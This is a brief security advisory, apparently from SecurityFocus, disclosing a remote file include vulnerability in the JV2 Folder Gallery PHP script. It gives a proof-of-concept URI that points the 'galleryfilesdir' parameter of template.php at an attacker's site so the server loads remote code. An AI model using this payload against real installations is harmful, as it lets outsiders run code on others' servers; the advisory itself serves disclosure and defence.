JV2 Folder Gallery Template.PHP Remote File Include Vulnerability

An attacker can exploit this issue via a web client.

The following proof-of-concept URI is available:

http://example.com/[JV2 Folder Gallery]/gallery/theme/include_mode/template.php?galleryfilesdir=attacker's site


 

Privacy Statement
Copyright 2010, SecurityFocus